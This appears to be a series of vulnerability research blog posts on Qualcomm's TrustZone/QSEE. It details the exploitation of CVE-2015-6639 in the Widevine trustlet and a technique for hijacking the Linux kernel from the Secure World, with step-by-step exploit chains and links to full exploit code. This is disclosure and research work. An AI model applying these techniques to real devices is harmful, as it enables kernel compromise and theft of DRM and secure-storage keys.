In this blog post we'll see how we can make use of this direct memory access in the "Secure World" in order to hijack the Linux Kernel running in the "Normal World", without even requiring a kernel vulnerability.

Interacting with QSEE

As we've seen in the previous blog post, when a user-space Android application would like to interact with a trustlet running in QSEE, it must do so by using a special Linux Kernel device, "qseecom". This device issues SMC calls which are handled by QSEOS, and are passed on to the requested trustlet in order to be handled.

Each command issued to a trustlet has a pair of associated input and output buffers, which are usually used to convey all the information to and from the "Normal World" and the trustlet.

However, there are some special use-cases in which a faster mode of communication is required - for example, when decrypting (or encrypting) large DRM-protected media files, the communication cost must be as small as possible in order to enable "smooth" playback.

Moreover, some devices include trustlets which are meant to assure the device's integrity (mostly in corporate settings). For example, Samsung provides "TrustZone-based Integrity Measurement Architecture" (TIMA) - a framework used to assure device integrity. According to Samsung, TIMA performs (among other things) periodic measurements of the "Normal World" kernel, and verifies that they match the original factory kernel.

So... Trustlets need fast communication with the "Normal World" and also need some ability to inspect the system's memory - sounds dangerous! Let's take a closer look.

Sharing (Memory) is Caring

Continuing our research on the "widevine" trustlet, let's take a look at the command used to DRM-encrypt a chunk of memory:

As we can see above, the function receives two pointers denoting the "input" and "output" buffers, respectively. These can be any arbitrary buffers provided by the user, so it stands to reason that some preparation would be needed in order to access them. Indeed, we can see that the preparation is done by calling "cacheflush_register", and, once the encryption process is done, the buffers are released by calling "cacheflush_deregister".

Upon closer inspection, "cacheflush_register" and "cacheflush_deregister" are simple wrappers around a couple of QSEE syscalls (each):

cacheflush_register	cacheflush_deregister
qsee_register_shared_buffer	qsee_prepare_shared_buf_for_nosecure_read
qsee_prepare_shared_buf_for_secure_read	qsee_deregister_shared_buffer

So what do these syscalls do?

Looking at the relevant handling code in QSEOS reveals that these names are a little misleading - in fact, "qsee_prepare_shared_buf_for_secure_read" merely invalidates the given range in data cache (so that QSEE will observe the updated data), and similarly "qsee_prepare_shared_buf_for_nosecure_read" clears the given range from the data cache (so that the "Normal World" will see the changes made by QSEE).

As for "qsee_register_shared_buffer" - this syscall is used to actually map the given ranges into QSEE. Let's see what it does:

After some sanity checks, the function checks whether the given memory region is within the "Secure World". If that's the case, it could be that the trustlet is trying to attack the TrustZone kernel by mapping-in and modifying memory regions used by TZBSP or QSEOS. Since that would be extremely dangerous, only a select few (six) specific regions within the "Secure World" can be mapped into QSEE. If the given address range is not within any of these special "tagged" regions, the operation is denied.

However - for any address in the "Normal World", there are no extra checks made! This means that QSEOS will happily allow us to use "qsee_register_shared_buffer" in order to map in any physical address in the "Normal World".

...Are you pondering what I'm pondering?

Hijacking the Linux Kernel

Since QSEE has read-write access to all of the "Normal World"'s memory (all it needs to do is ask), we should theoretically be able to locate the running Linux Kernel in the "Normal World" directly in physical memory and inject code into it.

As a fun exercise, let's create a QSEE shellcode that doesn't require any kernel symbols - this way it can be used in any QSEE context in order to locate and hijack the running kernel.

Recall that after booting the device, the bootloader uses the data specified in the Android boot image in order to extract the Linux Kernel into a given physical address and execute it:

The physical load address of the Linux Kernel is then available to any process via the world-readable file /proc/iomem:

However, simply knowing where the kernel is loaded does not absolve us from the need to find kernel symbols - there is a large amount of kernel images and an equally large amount of symbols per kernel. As such, we need some way to find the all of the kernel's symbols dynamically using the running kernel's memory. However, all is not lost - remember that the Linux Kernel keeps a list of all kernel symbols internally (!), and allows kernel modules to lookup these symbols using a special lookup function - "kallsyms_lookup_name". So how does this work?

As we've previously seen - the names in the kernel's symbol table are compressed using a 256-entry huffman coding generated at build time. The huffman table is stored within the kernel's image, alongside the descriptors for each symbol denoting the indices in the huffman table used to decompress it's name. And, of course, the actual addresses for all of the symbols are similarly stored in the kernel's image.

In order to access all the information in the symbol table, we must first find it within the kernel's image.

As luck would have it, the first region of the symbol table - the "Symbol Address Table", always begins with two pointers to the kernel's virtual load address (which can be easily calculated from the kernel's physical load address since there's no KASLR). Moreover, the symbol addresses in the table are monotonically nondecreasing addresses within the kernel's virtual address range - a fact which we can use to confirm our suspicion whenever we find two such consecutive pointers to the kernel's virtual load address.

Symbol Address Table

Now that we can find the symbol table within the kernel's image, all we need to do is implement the decompression scheme in order to be able to iterate over it and lookup any symbol. Great!

Using the method above to find the kernel's symbol table, we can now locate and hijack any kernel function from QSEE. Following the tradition from the previous kernel exploits, let's hijack an easily accessible function pointer from a very rarely-used network protocol - PPPOLAC.

The function pointers relating to this protocol are stored in the following kernel structure:

Overwriting the "release" pointer in this structure would cause the kernel to execute our crafted function pointer whenever a PPPOLAC socket is closed.

Putting it all together

Now that we have all the pieces, all we need to do to gain code execution within the Linux Kernel is to:

Achieve QSEE code execution
Map-in all the kernel's memory in QSEE using "qsee_register_shared_buffer"
Find the kernel's symbol table
Lookup the "pppolac_proto_ops" symbol in the symbol table
Overwrite any function pointer to our user-supplied function address
Flush the changes made in QSEE using "qsee_prepare_shared_buf_for_nosecure_read"
Cause the kernel to call our user-supplied function by using a PPPOLAC socket

I've written some QSEE code which performs all of these steps and exports an easy-to-use interface to allow kernel code execution, like so:

As always, you can find the full code here:

https://github.com/laginimaineb/WarOfTheWorlds

I should note that the code currently only reads memory one DWORD at a time, making it quite slow. I didn't bother to speed it up, but any and all improvements are more than welcome (for example, reading large chunks of memory at a time would be much faster).

In the next blog post, we'll continue our journey from zero-to-TrustZone, and attempt to gain code execution within the TrustZone kernel.

QSEE privilege escalation vulnerability and exploit (CVE-2015-6639)

2016-05-02T15:23:00.000+03:00

In this blog post we'll discover and exploit a vulnerability which will allow us to gain code execution within Qualcomm's Secure Execution Environment (QSEE). I've responsibly disclosed this vulnerability to Google and it has been fixed - for the exact timeline, see the "Timeline" section below.

The QSEE Attack Surface

As we've seen in the previous blog post, Qualcomm's TrustZone implementation enables the "Normal World" operating system to load trusted applications (called trustlets) into a user-space environment within the "Secure World", called QSEE.

This service is provided to the "Normal World" by sending specific SMC calls which are handled by the "Secure World" kernel. However, since SMC calls cannot be invoked from user-mode, all communication between the "Normal World" and a trustlet must pass through the "Normal World" operating system's kernel.

Having said that, regular user-space processes within the "Normal World" sometimes need to communicate with trustlets which provide specific services to them. For example, when playing a DRM protected media file, the process in charge of handling media within Android, "mediaserver", must communicate with the appropriate DRM trustlet in order to decrypt and render the viewed media file. Similarly, the process in charge of handling cryptographic keys, "keystore", needs to be able to communicate with a special trustlet ("keymaster") which provides secure storage and operation on cryptographic keys.

So if communicating with trustlets requires the ability to issue SMCs, and this cannot be done from user-mode, then how do these processes actually communicate with the trustlets?

The answer is by using a Linux kernel device, called "qseecom", which enables user-space processes to perform a wide range of TrustZone-related operations, such as loading trustlets into the secure environment and communicating with loaded trustlets.

However! Although necessary, this is very dangerous; communication with TrustZone exposes a large (!) attack surface - if any trustlet that can be loaded on a particular device contains a vulnerability, we can exploit it in order to gain code execution within the trusted execution environment. Moreover, since the trusted execution environment has the ability to map-in and write to all physical memory belonging to the "Normal World", it can also be used in order to infect the "Normal World" operating system's kernel without there even being a vulnerability in the kernel (simply by directly modifying the kernel's code from the "Secure World").

Because of the dangers outlined above, the access to this device is restricted to the minimal set of processes that require it. A previous dive into the permissions required in order to access the driver has shown that only four processes are able to access "qseecom":

surfaceflinger (running with "system" user-ID)
drmserver (running with "drm" user-ID)
mediaserver (running with "media" user-ID)
keystore (running with "keystore" user-ID)

This means that if we manage to get a hold of any of these four processes, we would then be able to directly attack any trustlet of our choice, directly bypassing the Linux kernel in the process! In fact, this is exactly what we'll do - but we'll get to that later in the series.

For this blog post, let's assume that we already have code-execution within the "mediaserver" process, thus allowing us to directly focus on the attack surface provided by trustlets. Here's an illustration to help visualise the path of the exploit chain we'll cover during the series and the focus of this post:

Vulnerability Scope

I haven't been able to confirm the exact scope of this issue. I've statically checked quite a few devices (such as the Droid Turbo, Nexus 6, Moto X 2nd Gen), and they were all vulnerable. In fact, I believe the issue was very wide-spread, and may have affected most Qualcomm-based devices at the time.

So why was this issue so prevalent? As we'll see shortly, the vulnerability is contained in a trustlet and so does not rely on the TrustZone kernel (which tends to change substantially between SoCs), but rather on code which is designed to be able to execute in the same manner on many different devices. As such, all devices containing the trustlet were made vulnerable, regardless of their SoC.

Also note that on some devices the vulnerable code was present but appeared slightly different (it may have been an older version of the same code). Those devices are also vulnerable, although the indicators and strings you might search for could be slightly different. This means that if you're searching for the exact strings mentioned in this post and don't find them, don't be dissuaded! Instead, reverse-engineer the trustlet using the tools from the previous blog post, and check for yourself.

Enter Widevine

Previously, we decided to focus our research efforts on the "widevine" trustlet, which enables playback of DRM encrypted media using Widevine's DRM platform. This trustlet seems like a good candidate since it is moderately complex (~125KB) and very wide-spread (according to their website, it is available on over 2 billion devices).

After assembling the raw trustlet, we are left with an ELF file, waiting to be analysed. Let's start by taking a look at the function registered by the trustlet in order to handle incoming commands:

As we can see, the first 32-bit value in the command is used to specify the command code, the high-word of which is used to sort the commands into four different categories.

Taking a peek at each of the category-handling functions reveals that the categories are quite rich - all in all, there are about 70 different supported commands - great! However, going over 70 different commands would be a pretty lengthy process - perhaps we can find a shortcut that'll point us in the right direction? For example, maybe there's a category of commands that were accidentally left in even though they're not used on production devices?

Since the libraries which are used to interact with the trustlets are also proprietary, we can't look through the source code to find the answers. Instead, I wrote a small IDAPython script to lookup all the references to "QSEECom_send_cmd", the function used to send commands to trustlets, and check what the "command-code" value is for each reference. Then I simply grouped the results into the categories above, producing the following results:

So... Nobody is using 5X commands. Suspicious!

Sifting through the functions in the 5X category, we reach the following command:

Pretty straight-forward: copies the data from our request buffer into a "malloc"-ed buffer (note that the length field here is not controlled by us, but is derived from the real buffer length passed to QSEOS). Then, the function's flow diverges according to a flag in our request buffer. Let's follow the flow leading to "PRDiagVerifyProvisioning":

Finally, we found a vulnerability!

After some simple validation (such as checking that the first DWORD in the command buffer is indeed zero), the function checks the value of the fourth DWORD in our crafted command buffer. As we can see above, setting that value to zero will lead us to a code-path in which a fully-controlled copy is performed from our command buffer into some global buffer, using the third DWORD as the length argument. Since this code-path only performs the vulnerable memcpy and nothing else, it is much more convenient to deal with (since it doesn't have unwanted side-effects), so we'll stick to this code-path (rather than the one above it, which seems more complex).

Moreover, you might be wondering what is the "global buffer" that's referred to in the function above. After all, it looks a little strange - it isn't passed in to the function at any point, by is simply referred to "magically", by using the register R9.

Remember how the trustlets that we analysed in the previous blog post had a large read-write data segment? This is the data segment in which all the modifiable data of the trustlet is stored - the stack, the heap and the global variables. In order to quickly access this segment from any location in the code, Qualcomm decided to use the platform-specific R9 register as a "global register" whose value is never modified, and which always points to the beginning of the aforementioned segment. According to the ARM AAPCS, this is actually valid behaviour:

What now?

Now that we have a primitive, it's time to try and understand which pieces of data are controllable by our overflow. Again, using a short IDAPython script, we can search for all references to the "global buffer" (R9) which reside after the overflown buffer's start address (that is, after offset 0x10FC). Here are the results:

Disappointingly, nearly all of these functions don't perform any "meaningful" operations of the controllable pieces of data. Specifically, the vast majority of these functions simply store file-system paths in those memory locations, which imply no obvious way to hijack control flow.

Primitive Technology

Since there aren't any function pointers or immediate ways to manipulate control flow directly after the overflown buffer, we'll need to upgrade our buffer overflow primitive into a stronger primitive before we can gain code execution.

Going through the list of functions above, we come across interesting block of data referred to by several functions:

As you can see above, the block of 0x32 DWORDs, starting at offset 0x169C, are used to store "sessions". Whenever a client sends commands to the Widevine trustlet, they must first create a new "session", and all subsequent operations are performed using the specific session identifier issued during the session's creation. This is needed, for example, in order to allow more than a single application to decrypt DRM content at the same time while having completely different internal states.

In any case, as luck would have it, the sessions are complex structures - hinting that they may be used in order to subtly introduce side-effects in our favour. They are also within our line-of-fire, as they are stored at an offset greater than that of the overflown buffer. But, unfortunately, the 0x32 DWORD block mentioned above only stores the pointers to these session objects, not the objects themselves. This means that if we want to overwrite these values, they must point to addresses which are accessible from QSEE (otherwise, trying to access them will simply result in the trustlet crashing).

Finding Ourselves

In order to craft legal session pointers, we'll need to find out where our trustlet is loaded. Exploring the relevant code reveals that QSEOS goes to great lengths in order to protect trustlets from the "Normal World". This is done by creating a special memory region, referred to as "secapp-region", from which the trustlet's memory segments are carved. This area is also protected by an MPU, which prevents the "Normal World" from accessing it in any way (attempting to access those physical addresses from the "Normal World" causes the device to reset).

On the other hand, trustlets reside within the secure region and can obviously access their own memory segments. Not only that, but in fact trustlets can access all allocated memory within the "secapp" region, even memory belonging to other trustlets! However, any attempt to access unallocated memory within the region results in the trustlet immediately crashing.

...Sounds like we're beginning to form a plan!

We can use the overflow primitive in order to overwrite a session pointer to a location within the "secapp" region. Now, we can find a command which causes a read attempt using our poisoned session pointer. If the trustlet crashes after issuing the command, we guessed wrong (in that case, we can simply reload the trustlet). Otherwise, we found an allocated page in the "secapp" region.

But... How do we know which trustlet that page belongs to?

We already have a way to differentiate between allocated and unallocated pages. Now, we need some way to distinguish between pages based on their contents.

Here's an idea - let's look for a function that behaves differently based on the read value in a the session pointer:

Okay! This function tries to access the data at session_pointer + 0xDA. If that value is equal to one, it will return the value 24, otherwise, it will return 35.

This is just like finding a good watermelon; by "tapping" on various memory locations and listening to the "sound" they make, we can deduce something about their contents. Now we just need to give our trustlet a unique "sound" that we can identify by tapping on it.

Since we can only listen to differences between one and non-one values, let's mark our trustlet by creating a unique pattern containing ones and zeros within it. For example, here's a pattern which doesn't occur in any other trustlet:

Now, we can simply write this pattern to the trustlet's data segment by using over overflow primitive, effectively giving it its own distinct "sound".

Finally, we can repeat the following strategy until we find the trustlet:

Randomly tap a memory location in the "secapp" region:

If it sounds "hollow" (i.e., the trustlet crashes) - there's nothing there, so reload our trustlet
Otherwise, tap the sequence of locations within the page which should contain our distinct marking pattern. If it sounds like the pattern above, we found our trustlet

Of course, inspecting the allocation scheme used by QSEOS could allow us to speed things further by only checking relevant memory locations. For example, QSEOS seems to allocate trustlets consecutively, meaning that simply scanning from the end of the "secapp" region to its beginning using increments of half the trustlet's size will guarantee a successful match.

A (messy) write primitive

Now that we have a way to find the trustlet in the secure region, we are able to craft "valid" session pointers, which point to locations within the trustlet. Next up, we need to find a way to create a write primitive. So... are there any functions which write controllable data into a session pointer?

Surprisingly, nearly all functions that do write data to the session pointer do not allow for arbitrary control over the data being written. Nonetheless, one function looks like it could be of some help:

This function generates a random DWORD to be used as a "nonce", then checks if enough time elapsed since the previous time it was called. If so, it adds the random value to the session pointer by calling "addNonceToCache".

First of all, since the "time" field is saved in the global buffer after our overflown buffer, we can easily clear it using our overflow primitive, thus removing the time limitation and allowing us to call the function as frequently as we'd like. Also, note that the generated nonce's random value is written into a buffer which is returned to the user - this means that after a nonce is generated, the caller also learns the value of the nonce.

Let's take a peek at how the nonces are stored in the session pointer:

So there's an array of 16 nonces in the session object - starting at offset 0x88. Whenever a nonce is added, all the previous nonce values are "rolled over" one position to the right (discarding the last nonce), and the new nonce is written into the first location in the nonce array.

See where we're going with this? This is actually a pretty powerful write primitive (albeit a little messy)!

Whenever we want to write a value to a specific location, we can simply set the session pointer to point to that location (minus the offset of the nonces array). Then, we can start generating nonces, until the least-significant byte (this is a little-endian machine) in the generated nonce matches the byte we would like to write. Then, once we get a match, we can increment the session pointer by one, generate the next byte, and so forth.

This allows us to generate any arbitrary value with an expectancy of only 256 nonce-generation calls per byte (since this is a geometric random variable). But at what cost?

Since the values in the nonce cache are "rotated" after every call, this means that we mess-up the 15 DWORDs after the last written memory location. We'll have to work our way around that when we design the exploit.

Writing an exploit

We finally have enough primitives to craft a full exploit! All we need to do is find a value that we can overwrite using the messy write primitive, which will allow us to hijack the control flow of the application.

Let's take a look at the function in charge of handling the "6X" category of commands:

As you can see, the function calls the requested commands by using the command ID specified as an index into an array stored in the global buffer. Each supported command is represented by a 12-byte entry in the array, containing four pieces of information:

The command code (32-bits)
A pointer to the handling function itself (32-bits)
The minimal input length (16-bits)
The minimal output length (16-bits)

If this information is valid, the function pointer is executed, passing in the user's input buffer as the first argument and the output buffer as the second argument.

If we choose an innocuous 6X command, we can overwrite the corresponding entry in the array above so that its function pointer will be directed at any piece of code we'd like to execute. Then, simply calling this command will cause the trustlet to execute the code at our controlled memory location. Great!

We should be wary, however, not to choose a function which lies directly before an "important" command that we might need later. This is because our messy write primitive will destroy the following 15 DWORDs (or rather, the next 5 array entries). Let's take a look at the function which populates the entries in the command array:

There are six consecutive entries corresponding to unused functions. Therefore, if we choose to overwrite the entry directly before them, we'll stay out of trouble.

Universal Shellcode Machine

Although we can now hijack the control flow, we still can't quite execute arbitrary code within QSEE yet. The regular course of action at point would probably be to find a stack-pivot gadget and write a short ROP chain which will enable us to allocate shellcode - however, since the trustlets' code segments aren't writeable, and the TrustZone kernel doesn't expose any system call to QSEE to allow the allocation of new executable pages, we are left with no way to create executable shellcode.

So does this mean we need to write all our logic as a ROP chain? That would be extremely inconvenient (even with the aid of automatic "ROP"-compilers), and might even not be possible if the ROP gadgets in the trustlet are not Turing-Complete.

Luckily, after some careful consideration, we can actually avoid the need to write longer ROP chain. If we think of our shellcode as a Turing Machine, we would like to create a "Universal Turing Machine" (or simulator), which will enable us to execute any given shellcode as if it were running completely within QSEE.

Given a piece of code, we can easily simulate all the control-flow and logic in the "Normal World", simply by executing the code fully in the "Normal World". But what about operations which behave differently in a QSEE-context? If we think about it, there are only a few such operations:

Reading and writing memory
Calling system calls exposed by the TrustZone kernel

These operations must execute within QSEE. However, we can actually execute both of these operations in QSEE by writing one small ROP chain!

All we need is a single ROP chain which will:

Hijack control flow to a separate stack
Prepare arguments for a function call
Call the wanted QSEE function
Return the result to the user and restore execution in QSEE

As you can see, all this chain do is to enable us to execute any given QSEE function using any supplied arguments. But how can we use it to simulate the special operations?

Well, since all system-calls in QSEE have matching calling-stubs in each trustlet, we can use our ROP chain to execute any system call with ease. As for memory accesses - there is an abundance of QSEE functions which can be used as read and write gadgets. Hence, both operations are simple to execute using our short ROP chain.

This leaves us with the following model:

This also means that executing arbitrary shellcode in QSEE doesn't require any engineering effort! All the shellcode developer needs to do is to delegate memory accesses and system calls to specific APIs exposed by the exploit. The rest of the shellcode's logic can remain unchanged and execute completely in the "Normal World". We'll see an example of some shellcode using this model shortly.

Finding a stack pivot

In order to execute a ROP chain, we need to find a convenient stack-pivot gadget. When dealing with large or medium-sized applications, this is not a daunting task - there is simply enough code for us to find at least one gadget that we can use.

However, since we're only dealing with ~125KB of code, we might not be that lucky. Not only that, but at the point at which we hijack the control flow, we only have control over the registers R0 and R1, which point to the input and output buffers, respectively.

After fully disassembling the trustlet's code we are faced with the harsh truth - it seems as though there is no usable stack pivot using our controlled registers. So what can we do?

Recall that ARM opcodes can be decoded in more than one way, depending on the value of the T bit in the CPSR. When the bit is set, the processor is executing in "Thumb" mode, in which the instruction length is 16-bits. Otherwise, the processor is in "ARM" mode, with an instruction length of 32-bits.

We can easily switch between these modes by using the least-significant bit of the PC register when performing a jump. If the least-significant bit is set, the T bit will be set, and the processor will switch to "Thumb" mode. Otherwise, it will switch to ARM mode.

Looking at the trustlet's code - it seems to contain mostly "Thumb" instructions. But perhaps if we were to forcibly decode the instructions as if they were "ARM" instructions, we'd be able to find a hidden stack pivot which was not visible beforehand.

Indeed, that is the case! Searching through the ARM opcodes reveals a very convenient stack-pivot:

By executing this opcode, we will be able to fully control the stack pointer, program counter and other registers by using the values stored in R0 - which, as we saw above, points to the fully user-controlled input buffer. Great!

As for the rest of the ROP chain - it is pretty standard. In order to execute a function and return all we need to do is build a short chain which:

Sets the low registers (R0-R3) and the stack arguments to the function's arguments
Set the link register to point to the rest of our chain
Jump to the function's start address
When control is returned via the crafted LR value, store the return value in user-accessible memory location, such as the supplied output buffer
Restore the stack pointer to the original location and return to the location from which control was originally hijacked

You can find the complete ROP chain and gadgets in the provided exploit code, but I imagine it's exactly what you'd expect.

Putting it all together

At long last, we have all the pieces needed to create a fully functional exploit. Here's a short run-down of the exploit's stages:

Find the Widevine application by repeatedly "tapping" the secapp region and "listening"
Create a "messy" write gadget using the nonce-generation command
Overwrite an unused 6X command entry using the write gadget to direct it to a stack-pivot
Execute any arbitrary code using a small ROP chain under the "Universal Shellcode Machine"

The Exploit

As always, the full exploit code is available here:

https://github.com/laginimaineb/cve-2015-6639

I've also included a sample shellcode using the model described earlier. The shellcode reads a file from TrustZone's secure file-system - SFS. This file-system is encrypted using a special hardware key which should be inaccessible to software running on the device - you can read more about it here. Regardless, running within the "Secure World" allows us to access SFS fully, and even extract critical encryption keys, such as those used to decrypt DRM content.

In fact, this is all it takes:

Also, please note that there are quite a few small details that I did not go into in this blog post (for brevity’s sake, and to keep it interesting). However, every single detail is documented in the exploit's code. So by all means, if you have any unanswered questions regarding the exploit, I encourage you to take a look at the code and documentation.

What's next?

Although we have full code-execution within QSEE, there are still some things beyond our reach. Specifically, we are limited only to the API provided by the system-calls exposed by the TrustZone kernel. For example, if we were looking to unlock a bootloader, we would probably need to be able to blow the device's QFuses. This is, understandably, not possible from QSEE.

With that in mind, in the next blog post, we'll attempt to further elevate our privileges from QSEE to the TrustZone kernel!

Timeline

27.09.2015 - Vulnerability disclosed
27.09.2015 - Initial response from Google
01.10.2015 - PoC sent to Google
14.12.2015 - Vulnerability fixed, patch distributed

I would also like to mention that on 19.10.2015 I was notified by Google that this issue has already been internally discovered and reported by Qualcomm. However, for some reason, the fix was not applied to Nexus devices.

Moreover, there are quite a few firmware images for other devices (such as the Droid Turbo) that I've downloaded from that same time period that appeared to still contain the vulnerability! This suggests that there may have been a hiccup when internally reporting the vulnerability or when applying the fix.

Regardless, as Google has included the issue in the bulletin on 14.12.2015, any OEMs that may have missed the opportunity to patch the issue beforehand, got another reminder.

Exploring Qualcomm's Secure Execution Environment

2016-04-26T14:16:00.000+03:00

Welcome to a new series of blog posts!

In this series, we'll dive once more into the world of TrustZone, and explore a new chain of vulnerabilities and corresponding exploits which will allow us to elevate privileges from zero permissions to code execution in the TrustZone kernel.

This may sound familiar to those of you who have read the previous series - but let me reassure you; this series will be much more exciting!

First of all, this exploit chain features a privilege escalation which is universal across all Android versions and phones (and which requires zero permissions) and a TrustZone exploit which affects a very wide variety of devices. Secondly, we will dive deep into an as-of-yet unexplored operating system - QSEE - Qualcomm's Secure Execution Environment. Lastly, we'll see some interesting TrustZone payloads, such as directly extracting a real fingerprint from TrustZone's encrypted file-system.

In case you would like to follow along with the symbols and disassembled binaries, I will be using my own Nexus 6 throughout this series, with the following fingerprint:

google/shamu/shamu:5.1.1/LMY48M/2167285:user/release-keys

You can find the exact factory image here.

Oh say can QSEE

In this blog post, we'll explore Qualcomm's Secure Execution Environment (QSEE).

As we've previously discussed, one of the main reasons for the inclusion of TrustZone on devices is the ability to provide a "Trusted Execution Environment" (TEE) - an environment which should theoretically allow computation which cannot be interfered with from the regular operating system, and is therefore "trusted".

This is achieved by creating a small operating system which operates solely in the "Secure World" facilitated by TrustZone. This operating system provides a small number of services directly in the form of system calls which are handled by the TrustZone kernel (TZBSP) itself. However, in order to allow for an extensible model where "trusted" functionality can be added, the TrustZone kernel can also securely load and execute small programs called "Trustlets", which are meant to provide a secure service to the insecure ("Normal World") operating system (in our case, Android).

There are several such Trustlets commonly used on devices:

keymaster - Implements the key management API provided by the Android "keystore" daemon. It can securely generate and store cryptographic keys and allow the users to operate on data using these keys.
widevine - Implementation of Widevine DRM, which allows "secure" playback of media on the device.

In fact, there are many more DRM related trustlets, depending on the OEM and the device, but these two trustlets are universally used.

Where do we start?

Naturally, one place to start would be to look at a trustlet of our choice, and to try and understand what makes it tick. Since the "widevine" module is one of the most ubiquitous, we'll focus on it.

Searching briefly for the widevine trustlet itself in the device's firmware reveals the following:

Apparently the trustlet is split into a few different files... Opening the files reveals a jumbled up mess - some files contain what looks like code, others contain ELF headers and metadata. In any case, before we can start disassembling the trustlet, we need to make some sense out of this format. We can either do this by opening each of the files and guessing the meaning of each blob, or by following the code-paths responsible for loading the trustlet - let's try a little of both.

Loading a Trustlet

In order to load a trustlet from the "Normal World", applications can use the libQSEECom.so shared object, which exports the function "QSEECom_start_app":

Unfortunately this library's source code is not available, so we'll have to reverse engineer the function's implementation to find out what it does. Doing so reveals that it performs the following operations:

Opens the /dev/qseecom device and calls some ioctls to configure it
Opens the ".mdt" file associated with the trustlet and reads the first 0x34 bytes from it
Calculates the number of ".bXX" files using the 0x34 bytes from the ".mdt"
Allocates a physically continuous buffer (using "ion") and copies the ".mdt" and ".bXX" files into it
Finally, calls a ioctl to load the trustlet itself, using the allocated buffer

So, still no luck on exactly how the images are loaded, but we're getting there.

First of all, the number 0x34 might look familiar - this is the size of a (32 bit) ELF header. Opening the MDT file reveals that the first 0x34 bytes are indeed a valid ELF header:

Moreover, the "QSEECOM_start_app" function we just had a look at used the word at offset 0x2C in order to calculate the number of ".bXX" files. As you can see above, this corresponds to the "e_phnum" field in the ELF header.

Since the "e_phnum" field is usually used to specify the number of program headers, this hints that perhaps each of the ".bXX" files contains single segment of the trustlet. Indeed, opening each of the files reveals content the seems like it may be a segment of the program being loaded... But in order to make sure, we'll need to find the program headers themselves (and see if they match the ".bXX" files).

Looking further, the next few chunks in the ".mdt" file are in fact the program headers themselves, one for each of the ".bXX" files present.

And, confirming our earlier suspicion, their sizes match the sizes of the ".bXX" files exactly. Great!

Note that the first two program headers above look a little strange - they are both NULL-type headers, meaning they are "reserved" and should not be loaded into the resulting ELF image. Strangely, opening the corresponding ".bXX" files reveals that the first block contains the same ELF header and program headers present in the ".mdt", and the second block contains the rest of the ".mdt" file.

In any case, here's a short schematic summing up what we know so far:

Also, note that since the ELF header and the program headers are all present in the ".mdt", we can use "readelf" in order to quickly dump the information about program headers in the trustlet:

At this point we have all the information we need in order to create a complete and valid ELF file from the ".mdt" and ".bXX" files; we have the ELF header and the program headers, as well as each of the segments themselves. We just need to write a small script that will create an ELF file using this data.

I've written a small python script which does just that. You can find it here:

https://github.com/laginimaineb/unify_trustlet

Reflections on Trusting Trustlets

By now have a basic understanding of how trustlets are assembled into an executable file, but we still don't know how they are verified. However, since we know the ".bXX" files contain only the segments to be loaded, this means that this data must reside in the ".mdt" file.

So it's time for some guesswork - if we were to build a trusted loader, how would we do it?

One very common paradigm would be to use hash-and-sign (relying on a CRHF and a digital signature). Essentially - we calculate the hash of the data to be authenticated and sign it using a private key for which a corresponding public key is known to the loader.

If that were the case, we'd expect to find two things in the ".mdt":

A certificate chain
A signature blob

Let's start by looking for a certificate chain. There are way too many formats for certificates, but since the ".mdt" file only contains binary data, we can assume it'll probably be a binary format, the most common of which is DER.

There's a quick hack we can use to find DER encoded certificates - they almost always start with an "ASN.1 SEQUENCE" blob, which is encoded as: 0x30 0x82. So let's search for these two bytes in the ".mdt" and save each found blob into a file. Now, we can check if these blobs are well-formed certificates using "openssl":

Yup, we guessed correctly - those are certificates.

In fact, the trustlet contains three certificates, one after the other. Just for good measure, we might also want to check that these three certificates are in fact a certificate chain which forms a valid chain of trust. We can do this by dumping the certificates to a single "certificate chain" file and using "openssl" to verify each certificate using this chain:

As for the root of trust of this chain - looking at the root certificate in the chain reveals the same root certificate which is used to verify all other parts of the boot chain in Qualcomm's "Secure Boot" process. There has been some research about this mechanism, which has shown that the validation occurs by comparing the SHA256 of the root certificate to a special value called "OEM_PK_HASH", which is "fused" into the devices QFuses during the production process. Since this value should theoretically not be modifiable after the production of the device, this means that forging such a root certificate would essentially require a second pre-image attack against SHA256.

Now, let's get back to the ".mdt" - we've found the certificate chain, so now it's time to look for a signature. Normally, the private key is used to produce a signature and the public key can be used to recover the signed data. Since we have the public key of the top-most certificate in the chain, we can use it to go over the file and opportunistically try to "recover" each blob.

But how will we know when we've succeeded?

Recall that RSA is a trapdoor permutation family - every blob with the same number of bits as the public modulus N is mapped to another blob of the same size.

However, while the RSA public modulus in our case is 2048 bits long, most hashes are much shorter than that (160 bits for SHA1, 256 bits for SHA256). This means that if we try to "decrypt" a blob using our public key and it happens to end with a lot of "slack" space (for example, zero bytes), there's a very good chance that this is the signature we're looking for (for a completely random permutation, the chance of n consecutive zero bits is 2^-n - extremely small for even a moderate n)

In order to do so, I wrote a small program which loads the public key from the top-most certificate in the chain and tries to "recover" each blob in the ".mdt" (using rsa_public_decrypt with PKCS #1 v1.5 padding). If the "recovered" blob ends with a bunch of zero bytes, the program outputs it. So... Running it on our ".mdt":

We've found a signature! Great.

What's more, this signature is 256 bits long, which implies that it may be a SHA256 hash... And if there's one SHA256 in the ".mdt", perhaps there are more?

Lucky once again!

As we can see, the SHA256 hashes for each of the ".bXX" files are also stored in the ".mdt", consecutively. We can also make an educated guess that this will be the data (or at least some of the data) that is signed to produce the signature we found earlier.

Note that the ".b01" file's hash is missing - why is that? Remember that the ".b01" file contains all the data in the ".mdt" other than the ELF header and program headers. Since this data also contains the signature above, and the signature is (possibly) produced over the hashes of the block files, this would cause a circular dependency (since changing the block file would change the hash, which would change the signature, which would again change the block file, etc.). So it makes sense that this block's hash wouldn't be present.

By now we've actually decoded all of the data in the ".mdt" file apart from a small structure which resides right after the program headers. However, after looking at it for a while, we can see that it simply contains pointers and lengths of the various parts of the ".mdt" that we've already decoded:

So finally, we've decoded all of the information in the ".mdt"... Phew.

Motorola's High Assurance Boot

Although the ".mdt" file format we've seen above is universal for all OEMs, Motorola decided to add a little twist.

Instead of supplying an RSA signature like the one we saw earlier, they actually leave the signature blob empty (in fact, the signature I showed you earlier was from a Nexus 5). In fact, Motorola's signature looks like this:

So how is the image verified?

This is done by using a mechanism which Motorola calls HAB ("High Assurance Boot"). This mechanism allows them to verify the ".mdt" file by appending a certificate chain and a signature over the whole ".mdt" to the end of the file, encoded using a proprietary format used by "HAB":

For more information about this mechanism, you can check out this great research by Tal Aloni. In short, the ".mdt" is hashed and signed using the top-most key in the certificate chain, while the root certificate in the chain is verified using a "Super Root Key", which is hard-coded in one of the bootloader's stages.

Life of a Trustlet

